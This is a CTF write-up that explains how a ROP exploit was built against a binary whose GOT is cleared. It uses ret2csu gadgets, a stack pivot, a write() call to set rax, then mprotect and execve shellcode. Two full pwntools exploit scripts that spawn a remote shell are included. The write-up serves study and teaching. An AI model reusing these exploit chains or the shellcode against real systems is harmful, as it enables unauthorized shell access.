External
Recon
As usual, we’ll start off by taking a look at the mitigations enabled in the binary:
$ checksec --file=./external
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 81) Symbols No 0 3 ./external
Cool, there’s no PIE and no canary, which will simplify things a bit in case we find a buffer overflow. Additionally, after opening the file with Cutter we can see that it’s linked against libc. This may come in handy as well, since the GOT is writeable (Partial RELRO).
Now let’s take an actual look at the disassembly itself. This is the code for main:
: int main (int argc, char **argv, char **envp);
; var void *buf @ rbp-0x50
0x00401224 push rbp
0x00401225 mov rbp, rsp
0x00401228 sub rsp, 0x50
; puts("ROP me\n")
0x0040122c lea rdi, str.ROP_me ; 0x402012 ; const char *s
0x00401233 call puts ; sym.imp.puts ; int puts(const char *s)
; printf("> ")
0x00401238 lea rdi, [0x0040201c] ; const char *format
0x0040123f mov eax, 0
0x00401244 call printf ; sym.imp.printf ; int printf(const char *format)
; read(0, buf, 0xf0)
0x00401249 lea rax, [buf]
0x0040124d mov edx, 0xf0 ; 240 ; size_t nbyte
0x00401252 mov rsi, rax ; void *buf
0x00401255 mov edi, 0 ; int fildes
0x0040125a call read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
; clear_got()
0x0040125f mov eax, 0
0x00401264 call clear_got ; sym.clear_got
; return 0
0x00401269 mov eax, 0
0x0040126e leave
0x0040126f ret
; comments added for clarity
It seems simple enough: it prints a pretty suggestive message (namely, “ROP me\n> “), reads from stdin into a buffer on the stack, and then calls clear_got. clear_got does exactly what one would expect: it memsets the whole GOT to 0 (more on this later). The buffer in which our answer is stored begins at rbp-0x50, but read is asked for up to 0xf0 bytes, so we get a buffer overflow that gives us control over both rbp and rip once the function returns (remember that leave; ret copies rbp into rsp and then pops rbp and rip from the stack).
So far we can overflow the buffer to overwrite the return address stored on the stack, and make main return to whatever address we want. Recall that PIE is not enabled, which means the binary is loaded at the same virtual address every time the program is executed. Every address within the binary therefore stays constant across executions, and will be the same on remote as well. In practice we can just hard-code addresses into the payload (this only applies to addresses within the binary, not to stack addresses and so on). This will be a huge benefit when we start working on our ROP chain.
While I’m at it, here’s a quick reminder on ROP (Return Oriented Programming). Basically, it works by changing the return address of a given function (in our case, main). We’ll make main return to an unintended address, where there’s some code that’s of interest to us. The program will continue to execute that code until it hits another ret, at which point it will return to whatever address is found on the top of the stack. If we get the math right when sending the payload, we can make that second ret jump to another portion of code that’s of interest to us, and so on. We’re only limited by the number of bytes we’re able to write during the first read (we can write 0xf0 bytes, but the first 0x58 only fill main’s stack frame and the saved rbp, which leaves 0x98 bytes for the chain itself), and by the availability of ‘interesting’ portions of code that end with a ret instruction.
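The space budget for the first stage can be checked with a few lines of arithmetic. This is only a sketch: the constants come from the disassembly of main shown earlier, and the p64 helper is a stdlib stand-in for the pwntools function of the same name.

```python
import struct

BUF_OFFSET = 0x50   # buf lives at rbp-0x50 (from the disassembly of main)
READ_SIZE = 0xf0    # third argument passed to read()
QWORD = 8

# Bytes needed to reach the saved rbp and the saved return address.
offset_saved_rbp = BUF_OFFSET
offset_ret_addr = BUF_OFFSET + QWORD

# Everything from the return address slot onwards is usable chain space.
chain_budget = READ_SIZE - offset_ret_addr
chain_slots = chain_budget // QWORD


def p64(value):
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack('<Q', value)


# A two-entry chain for illustration: return into the lone `ret` gadget at
# 0x40101a, then back into the start of main at 0x401224.
payload = b'A' * offset_saved_rbp + p64(0) + p64(0x40101a) + p64(0x401224)

print(hex(offset_ret_addr), hex(chain_budget), chain_slots)
```

Each entry in the chain costs one qword, so the number of slots is the hard limit on how much the first stage can do.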
At this point it looks like all of this will be pretty easy, right? There’s only one problem: the GOT has been zeroed out. Why is this important? Well, the GOT (Global Offset Table) holds the address of every libc function our binary imports. When we make a call to a libc function, the program looks up the address of that function in the GOT, and then jumps to it. This is what a call to printf does, as an example:
: int printf (const char *format);
0x00401050 jmp qword [reloc.printf] ; 0x404028
0x00401056 push 2 ; 2
0x0040105b jmp section..plt
As you can see, the first thing printf does is jump to whatever address is stored at 0x404028, which is the entry for printf in the GOT. When the binary first loads, that entry holds the qword 0x401056, so jumping through reloc.printf does nothing but continue with the next instruction. From there the dynamic linker is called, and it fills the GOT entry with the correct address for printf. After that, reloc.printf points to the actual code for printf, which means any subsequent calls are resolved much faster.
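The lazy-binding behaviour can be mimicked with a toy model. This is not loader code, just a sketch of the bookkeeping: the PLT and GOT addresses come from the listing above, while LIBC_PRINTF is a made-up runtime address and resolve() is a hypothetical stand-in for the dynamic linker.

```python
# Toy model of lazy binding for a single imported function.
PLT_PRINTF_PUSH = 0x401056     # `push 2`, the instruction right after the jmp
GOT_PRINTF = 0x404028          # GOT slot read by the PLT stub
LIBC_PRINTF = 0x7ffff7e30000   # hypothetical runtime address of printf

got = {GOT_PRINTF: PLT_PRINTF_PUSH}   # state right after the binary is loaded


def resolve():
    """Stand-in for the dynamic linker: patch the GOT slot, return the target."""
    got[GOT_PRINTF] = LIBC_PRINTF
    return LIBC_PRINTF


def call_via_plt():
    """Follow `jmp qword [reloc.printf]` and report where execution ends up."""
    target = got[GOT_PRINTF]
    if target == PLT_PRINTF_PUSH:
        return resolve()   # first call: fall through into the resolver
    return target          # later calls: jump straight to the stored address


first = call_via_plt()
second = call_via_plt()

got[GOT_PRINTF] = 0            # what clear_got does to the slot
after_clear = call_via_plt()   # the stub would now jump to address 0
repopulated = resolve()        # jumping to 0x401056 directly runs the resolver

print(hex(first), hex(second), hex(after_clear), hex(repopulated))
```

In this model a zeroed slot sends the stub to address 0, while entering the stub at its second instruction skips the GOT lookup and restores the entry.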
Exploitation
Now let’s move on to the actual exploit.
As you can probably imagine, in order to bypass the fact that the GOT has been erased, we could jump directly to 0x401056 and have the GOT entry for printf re-populated. We could do that for every libc function, and then go from there. That’s entirely doable and it was, in fact, our first approach. We constructed a ROP chain that would call all of the libc functions in the GOT. This would re-populate the GOT, and give us the possibility of using libc functions again. Once this was done, we would call printf with the right arguments in order to leak addresses from libc and calculate the address of system. Finally, we would have everything we needed to call system("/bin/sh").
And it worked… locally. For some unknown reason this exploit worked like a charm on our local hosts, but not on remote. After some debugging we found that calling memset was causing trouble (maybe because we couldn’t control the third argument passed to it, so it would try to memset too many bytes?).
For a more in-depth explanation of how to leak libc addresses, and how that helps to identify which libc version is being used on remote, check out the write-up on The Pwn Inn from this same CTF, in which we dive into a lot more detail on how it works. Since this was not the way we ended up solving the challenge, we won’t delve into too much detail on it right now (though the code we tried can be found at the end of this write-up).
At last, we decided to go down a different path: we’ll try to invoke mprotect somehow, and get the stack to be executable. At that point we can open up a shell with a little bit of shellcode, no libc involved. There are only two problems: 1) we don’t know where the stack is located, 2) we lack gadgets.
Quick note for those unfamiliar with ROP. Remember how I talked about using ‘interesting’ bits of code ending in a ret instruction before? It turns out those pieces of code are called ‘gadgets’.
Let’s quickly address each of these issues:
Finding gadgets
As it turns out, we’re surprisingly low on gadgets. We need at the very least five things: a way to control rax, rdi, rsi and rdx, plus a syscall instruction. Why? Well, if we want to make an mprotect syscall we’ll want to control all three parameters passed to it (these are stored in rdi, rsi and rdx respectively), the syscall number is stored in rax, and the syscall is made with the syscall instruction. We’re asking for a lot of things here, but the only useful gadgets we’ve managed to find are:
$ ROPgadget --binary ./external
Gadgets information
============================================================
0x0000000000401269 : mov eax, 0 ; leave ; ret
; ...
0x000000000040127d : mov eax, 1 ; syscall
; ...
0x00000000004012f3 : pop rdi ; ret
0x00000000004012f1 : pop rsi ; pop r15 ; ret
; ...
0x000000000040101a : ret
; ...
0x0000000000401277 : syscall
Unique gadgets found: 106
And of course we can also use some parts of the actual disassembly as well.
Well, we can control rdi, rsi, invoke syscall with rax equal to 1 or 0, and not a whole lot more. But if we look closely at the code we can find something useful:
: __libc_csu_init (int64_t arg1, int64_t arg2, int64_t arg3);
; arg int64_t arg1 @ rdi
; arg int64_t arg2 @ rsi
; arg int64_t arg3 @ rdx
; ...
0x004012d0 mov rdx, r14
0x004012d3 mov rsi, r13
0x004012d6 mov edi, r12d
0x004012d9 call qword [r15 + rbx*8]
0x004012dd add rbx, 1
0x004012e1 cmp rbp, rbx
0x004012e4 jne 0x4012d0
0x004012e6 add rsp, 8
0x004012ea pop rbx
0x004012eb pop rbp
0x004012ec pop r12
0x004012ee pop r13
0x004012f0 pop r14
0x004012f2 pop r15
0x004012f4 ret
Isn’t this a bit interesting? Say we jumped to address 0x4012ea, then rbx, rbp and r12 through r15 will be popped from the stack, then a ret will be executed. What if that ret jumped to address 0x4012d0? Then all those values previously popped from the stack would be inserted into rdx, rsi and edi. That’s just what we want!
Actually, using this approach we can only write an arbitrary value into edi (the lower 32 bits of rdi), but we don’t need to worry that much about this, because all of the addresses we’re interested in fit in one dword, plus writing to edi zeros out the higher 32 bits of rdi.
There’s a catch though: r15 + rbx * 8 needs to point to an address where another address is stored. That second address should point to some code that won’t modify rdx (ideally none of the previous registers, but rdx is the only one we really can’t afford to lose), and that will eventually lead to a ret. Also, since the instruction at 0x4012d9 is a call, it pushes a return address onto the stack, so our ROP chain will not continue until the ret at 0x4012f4 is executed (and for that to happen the jne at 0x4012e4 must not be taken, so rbp should be equal to rbx plus 1).
This isn’t so bad as it may seem at first glance, though. If we load 0x403e38 into r15 and 0x0 into rbx then that call at 0x4012d9 will take us to the following bit of code:
: _fini ();
0x00401308 endbr64 ; [14] -r-x section size 13 named .fini
0x0040130c sub rsp, 8
0x00401310 add rsp, 8
0x00401314 ret
That’s because, for whatever reason, the qword stored at 0x403e38 is equal to 0x401308 (don’t ask me where I got that from, hours of staring at hexdump’s output were involved). Since rbp should be equal to rbx plus 1 (rbx is incremented right before the cmp), and rbx needs to be 0x0, we don’t have a choice but to load 0x1 into rbp.
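To double-check the register shuffling, the two gadgets can be modelled in a few lines. This is a rough sketch rather than an emulator: the memory dictionary holds only the one qword mentioned above, and csu_gadgets is a hypothetical helper name.

```python
MASK64 = (1 << 64) - 1

# Only the one memory cell the walkthrough relies on: [0x403e38] -> _fini.
memory = {0x403e38: 0x401308}


def csu_gadgets(rbx, rbp, r12, r13, r14, r15):
    """Model the pops at 0x4012ea followed by one pass through 0x4012d0."""
    rdx = r14                            # mov rdx, r14
    rsi = r13                            # mov rsi, r13
    rdi = r12 & 0xffffffff               # mov edi, r12d zero-extends into rdi
    slot = (r15 + rbx * 8) & MASK64
    call_target = memory[slot]           # call qword [r15 + rbx*8]
    rbx = (rbx + 1) & MASK64             # add rbx, 1
    loops_again = rbp != rbx             # jne 0x4012d0
    return {'rdi': rdi, 'rsi': rsi, 'rdx': rdx,
            'call_target': call_target, 'loops_again': loops_again}


# Register values for read(0, 0x404000, 0x1000), as used in the exploit.
state = csu_gadgets(rbx=0, rbp=1, r12=0, r13=0x404000, r14=0x1000, r15=0x403e38)
print(state)
```

With rbx = 0 and rbp = 1 the jne is not taken, so execution falls through to the pops and the final ret. Any other rbp would send the loop around again with rbx = 1.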
This is getting a little convoluted, I hope I didn’t lose you so far. To summarize, the only takeaway here is: rdx is ours, but changing its value will cost us a lot of space in our ROP chain. This isn’t really a problem though, since we can just use this gigantic ROP chain to fire a second read syscall. One might (fairly) argue: Why make such an annoying ROP chain just to invoke read again? Well, now that we control the arguments passed on to read, we can make the second read call read an enormous amount of bytes, and store the result in a known address. As we’ll see, this will come in handy later on.
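To put a number on that cost, here is a sketch of a helper that emits the chain fragment for one such call. The name csu_call and the stdlib p64 stand-in are illustrative assumptions. The addresses are the ones from the listings above.

```python
import struct

POP_REGS = 0x4012ea       # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
MOV_AND_CALL = 0x4012d0   # mov rdx, r14; mov rsi, r13; mov edi, r12d; call [r15 + rbx*8]
FINI_PTR = 0x403e38       # address that holds a pointer to _fini


def p64(value):
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack('<Q', value)


def csu_call(rdi, rsi, rdx):
    """Hypothetical helper: chain fragment that loads edi, rsi and rdx."""
    chain = p64(POP_REGS)
    chain += p64(0)           # rbx
    chain += p64(1)           # rbp = rbx + 1, so the loop exits after one pass
    chain += p64(rdi)         # r12 -> edi
    chain += p64(rsi)         # r13 -> rsi
    chain += p64(rdx)         # r14 -> rdx
    chain += p64(FINI_PTR)    # r15
    chain += p64(MOV_AND_CALL)
    chain += b'A' * (7 * 8)   # add rsp, 8 plus six pops on the way out
    return chain


fragment = csu_call(0, 0x404000, 0x1000)
print(hex(len(fragment)))
```

One fragment is 0x78 bytes before the syscall gadget is even appended, which is why a single call is about all that fits into the first read.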
Where did those two functions, _fini and __libc_csu_init, come from? Well, it turns out these are pieces of code that the compiler automatically attaches to our executable every time we compile a program (at least gcc does it on GNU/Linux). Using these gadgets is known as ret2csu; you can read more about it and how it’s used in this paper.
Finding the stack
I’ll say this upfront: we don’t need to find the stack. After the read discussed in the previous section is executed, we can use the region of memory that holds the result as a fake stack. It’ll work like this:
- Use the ROP chain discussed previously to read as many bytes as we want into address X (we need to make sure this address is writeable first)
- Make rsp point to address X
- Continue executing our ROP from there
That’s it! Now we’ve got a larger buffer that we can use to invoke mprotect. Since our ‘stack’ is now at a known address, we can make that region executable and finally jump to our shellcode (which should be stored there as well).
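The pivot itself can be traced by hand. The exploit further down uses the pop rsp; pop r13; pop r14; pop r15; ret gadget at 0x4012ed for it, and the sketch below models that gadget on a dictionary-backed memory. OLD_RSP is a made-up value, since the real stack address is unknown.

```python
FAKE_STACK = 0x404000   # X: writable address filled by the second read
QWORD = 8


def pivot(memory, rsp):
    """Model `pop rsp; pop r13; pop r14; pop r15; ret` starting at rsp."""
    rsp = memory[rsp]       # pop rsp: rsp now points at the fake stack
    for _ in range(3):      # pop r13; pop r14; pop r15 consume three qwords
        rsp += QWORD
    rip = memory[rsp]       # ret: the next gadget address is read from X + 0x18
    rsp += QWORD
    return rip, rsp


OLD_RSP = 0x7ffd00000000    # hypothetical; the real value is never needed
memory = {
    OLD_RSP: FAKE_STACK,                      # qword following the gadget address
    FAKE_STACK + 0x00: 0x4141414141414141,    # filler popped into r13
    FAKE_STACK + 0x08: 0x4141414141414141,    # filler popped into r14
    FAKE_STACK + 0x10: 0x4141414141414141,    # filler popped into r15
    FAKE_STACK + 0x18: 0x4012ea,              # first gadget of the next stage
}

rip, rsp = pivot(memory, OLD_RSP)
print(hex(rip), hex(rsp))
```

This is why the second-stage payload has to start with 0x18 bytes of filler before its first gadget address.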
Invoking mprotect
Quick sidenote on invoking mprotect: we have no direct control over rax. To get around this, we can use our ROP chain to invoke a write syscall.
Recall that we now control rdi, rsi and rdx, and that there’s a gadget that does mov rax, 1; syscall; ret (1 is the syscall number for write), so invoking syscall with the right arguments should be no problem.
We can tell the kernel to write 0x0a bytes (0x0a being the syscall number for mprotect) from any readable address to standard output. As a result, the kernel leaves the number of written bytes (0x0a) in rax as the return value. As you can see, it just takes a little bit of work, but that way we can control rax as well!
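The trick relies on nothing more than the return value of write. A quick way to see it from Python, where os.write hands back what the syscall returned (the pipe is only there so that nothing is printed):

```python
import os

SYS_MPROTECT = 10   # mprotect's syscall number on x86-64 Linux

# write(2) returns the number of bytes written; os.write exposes that value.
read_end, write_end = os.pipe()
written = os.write(write_end, b'A' * SYS_MPROTECT)
os.close(write_end)
os.close(read_end)

print(written)
```

In the exploit the same value ends up in rax, ready for the next syscall instruction.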
Putting it all together
All of this might feel a bit overwhelming because of all the details involved, but try to keep in mind the core idea:
- We have a way of invoking a read syscall while controlling all of its arguments, so we read an awful amount of bytes into some address X.
- We make rsp point to that address (using gadgets like leave; ret, since we have control over rbp; the script below uses the pop rsp gadget at 0x4012ed instead).
- Now the ‘stack’ is located at a known address and we have total control over its contents. So we use this fake stack to call write(1, [whatever], 0x0a) using the same mechanism as in step 1, effectively filling rax with 0x0a.
- Now that rax is 0x0a, we again use the same mechanism as in step 1 to invoke a syscall that makes the whole memory page at X executable.
- We jump to our shellcode, which is stored at X + [someOffset].
The resulting exploit will look something like this (using Python and pwntools):
from pwn import *
context.update(os='linux', arch='amd64')
p = remote('161.97.176.150', 9999)
# First payload, this will just trigger read(0, 0x404000, 0x1000)
# Why 0x404000? Well, that's a read-write memory section, that means the whole page
# is read-write, so we've got 0x1000 bytes to play around with at that address
payload0 = b''
payload0 += 0x58 * b'A' # padding
payload0 += p64(0x4012ea) # address of gadget 1 (pop rbx; pop ... ; ret)
payload0 += p64(0x0) # rbx
payload0 += p64(0x1) # rbp
payload0 += p64(0x0) # r12
payload0 += p64(0x404000) # r13
payload0 += p64(0x1000) # r14
payload0 += p64(0x403e38) # r15
payload0 += p64(0x4012d0) # address of gadget 2 (mov rdx, r14; mov ...; call [r15 + rbx * 8])
# Since after the call instruction (address 0x4012dd) rbx, rbp,
# r12-r15 will be popped again, we need to add some padding
payload0 += (7 * 0x8) * b'A' # padding
payload0 += p64(0x401283) # address of syscall ; ret
payload0 += p64(0x4012ed) # address of gadget 3 (pop rsp; pop ... x3 ; ret)
# Address of our new 'stack' (will be popped into rsp)
payload0 += p64(0x404000)
p.info('Sending ' + hex(len(payload0)) + ' bytes')
p.recvuntil(b'> ')
p.send(payload0)
# This payload will be read into our fake stack, we need to remember that because
# of gadget 3 from payload0 (pop rsp; 3 x pop ; ret) we need to insert 0x18 bytes of
# padding at the beginning
payload1 = b''
payload1 += b'A' * 0x18 # padding
# Let's trigger write(1, 0x404000, 0xa) so we can set rax to 0xa
# Same concept as before, fill rdi, rsi, rdx with the desired values
payload1 += p64(0x4012ea) # gadget 1
payload1 += p64(0x0) # rbx
payload1 += p64(0x1) # rbp
payload1 += p64(0x1) # r12
payload1 += p64(0x404000) # r13
payload1 += p64(0xa) # r14
payload1 += p64(0x403e38) # r15
payload1 += p64(0x4012d0) # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x40127c) # mov rax, 1; syscall ; ret
# Now that rax is set to 0x0a, let's trigger mprotect(0x404000, 0x1000, 0x7)
# Again, same concept, fill rdi, rsi and rdx with the desired values
payload1 += p64(0x4012ea) # gadget 1
payload1 += p64(0x0) # rbx
payload1 += p64(0x1) # rbp
payload1 += p64(0x404000) # r12
payload1 += p64(0x1000) # r13
payload1 += p64(0x7) # r14
payload1 += p64(0x403e38) # r15
payload1 += p64(0x4012d0) # gadget 2
payload1 += (7 * 0x8) * b'A' # padding
payload1 += p64(0x401283) # syscall ; ret
# Address of our shellcode, our payload begins at address 0x404000, so we should add
# the current length of the payload plus 0x8, to account for this value
payload1 += p64(0x404000 + len(payload1) + 8)
# Basic shellcode that triggers execve('/bin/sh', 0, 0), since the 'read' syscall
# is used to read the shellcode we don't need to worry about special characters
# null characters, or anything of the like
shellcode = b'\xb8\x3b\x00\x00\x00\x48\x8d\x3d\x08\x00\x00\x00\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68\x00'
payload1 += shellcode
p.info('Sending ' + hex(len(payload1)) + ' bytes')
p.send(payload1)
# Receive those 0xa bytes we've written so that the output doesn't get polluted
p.recv(0xa)
# Profit!
p.interactive()
The exploit in action:
$ python exploit.py
[+] Opening connection to 161.97.176.150 on port 9999: Done
[*] Sending 0xe8 bytes
[*] Sending 0x13c bytes
[*] Switching to interactive mode
$ ls
bin
dev
etc
external
flag.txt
lib
lib64
usr
$ cat flag.txt
flag{0h_nO_My_G0t!!!!1111!1!}
$
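The two sizes reported in the log can be reproduced offline, which is a cheap sanity check before touching the remote. A small sketch, assuming the payload layout of the script above (the constant names are made up for the example):

```python
QWORD = 8
CSU_CALL = 8 * QWORD + 7 * QWORD   # gadget 1, six registers, gadget 2, padding
SHELLCODE_LEN = 28                 # length of the shellcode bytes in the script

# payload0: padding, one ret2csu call, syscall gadget, pivot gadget, new rsp.
payload0_len = 0x58 + CSU_CALL + 3 * QWORD

# payload1: pivot padding, two ret2csu calls each followed by one gadget,
# the pointer to the shellcode, then the shellcode itself.
chain_len = 0x18 + 2 * (CSU_CALL + QWORD)
shellcode_addr = 0x404000 + chain_len + QWORD
payload1_len = chain_len + QWORD + SHELLCODE_LEN

print(hex(payload0_len), hex(payload1_len), hex(shellcode_addr))
```

The first payload stays under the 0xf0 bytes accepted by the initial read, and the second one is far below the 0x1000 bytes requested by the second read.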
Honorable mentions
For those of you who are curious, here’s the initial attempt that we made which I talked about earlier (populating the GOT and calling system):
from pwn import *
import sys
context(os='linux', arch='amd64')
binary = ELF('./external')
# This is the libc in use on remote. We found out the version
# by leaking addresses and looking at the offsets between them
libc = ELF('./libc-2.28.so')
off_printf_got = binary.got['printf']
off_system_libc = libc.symbols['system']
off_printf_libc = libc.symbols['printf']
off_binsh_libc = next(libc.search(b"/bin/sh"))
exploit = b"\x41" * 0x58 # buffer + rbp
exploit += p64(0x4012f3) # pop rdi ; ret
exploit += p64(0x402012) # rdi = &"Ropme"
exploit += p64(0x401056) # printf call
exploit += p64(0x4012f3) # pop rdi ; ret
exploit += p64(off_printf_got) # rdi = printf@got
exploit += p64(0x401036) # puts call
exploit += p64(0x4012f3) # pop rdi ; ret
exploit += p64(0x404050) # rdi -> data section
exploit += p64(0x401066) # memset call
exploit += p64(0x401086) # read call
exploit += p64(binary.symbols['main'])
p = remote('161.97.176.150', 9999)
p.recvline()
p.recvuntil(b' ')
p.sendline(exploit)
printf_libc_addr = p.recvline()
printf_libc_addr = u64(printf_libc_addr[9:-1] + b"\x00\x00")
system = printf_libc_addr - off_printf_libc + off_system_libc
binsh = printf_libc_addr - off_printf_libc + off_binsh_libc
log.info("printf @ {}".format(hex(printf_libc_addr)))
log.info("offset printf @ {}".format(hex(off_printf_libc)))
log.info("offset system @ {}".format(hex(off_system_libc)))
log.info("offset /bin/sh @ {}".format(hex(off_binsh_libc)))
log.info("system @ {}".format(hex(system)))
log.info("/bin/sh @ {}".format(hex(binsh)))
exploit2 = b"\x41" * 0x58 # buffer + rbp
exploit2 += p64(0x4012f3) # pop rdi ; ret
exploit2 += p64(binsh) # rdi -> /bin/sh
exploit2 += p64(system)
p.recvline()
p.recvuntil(b' ')
p.sendline(exploit2)
p.interactive()
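The address arithmetic in this script boils down to a few lines. The sketch below uses made-up numbers throughout: the offsets and the leaked bytes are purely illustrative and do not correspond to any particular libc build.

```python
import struct


def u64_padded(leak):
    """Zero-pad a leaked little-endian pointer to 8 bytes and unpack it."""
    return struct.unpack('<Q', leak.ljust(8, b'\x00'))[0]


# Hypothetical values; real offsets come from the libc file in use on remote.
OFF_PRINTF = 0x58560
OFF_SYSTEM = 0x449c0
leaked = bytes.fromhex('60857af7ff7f')   # six bytes, as puts would print them

printf_addr = u64_padded(leaked)
libc_base = printf_addr - OFF_PRINTF
system_addr = libc_base + OFF_SYSTEM

print(hex(printf_addr), hex(libc_base), hex(system_addr))
```

A page-aligned libc base is a good sign that the leak was parsed correctly and that the offsets belong to the right libc.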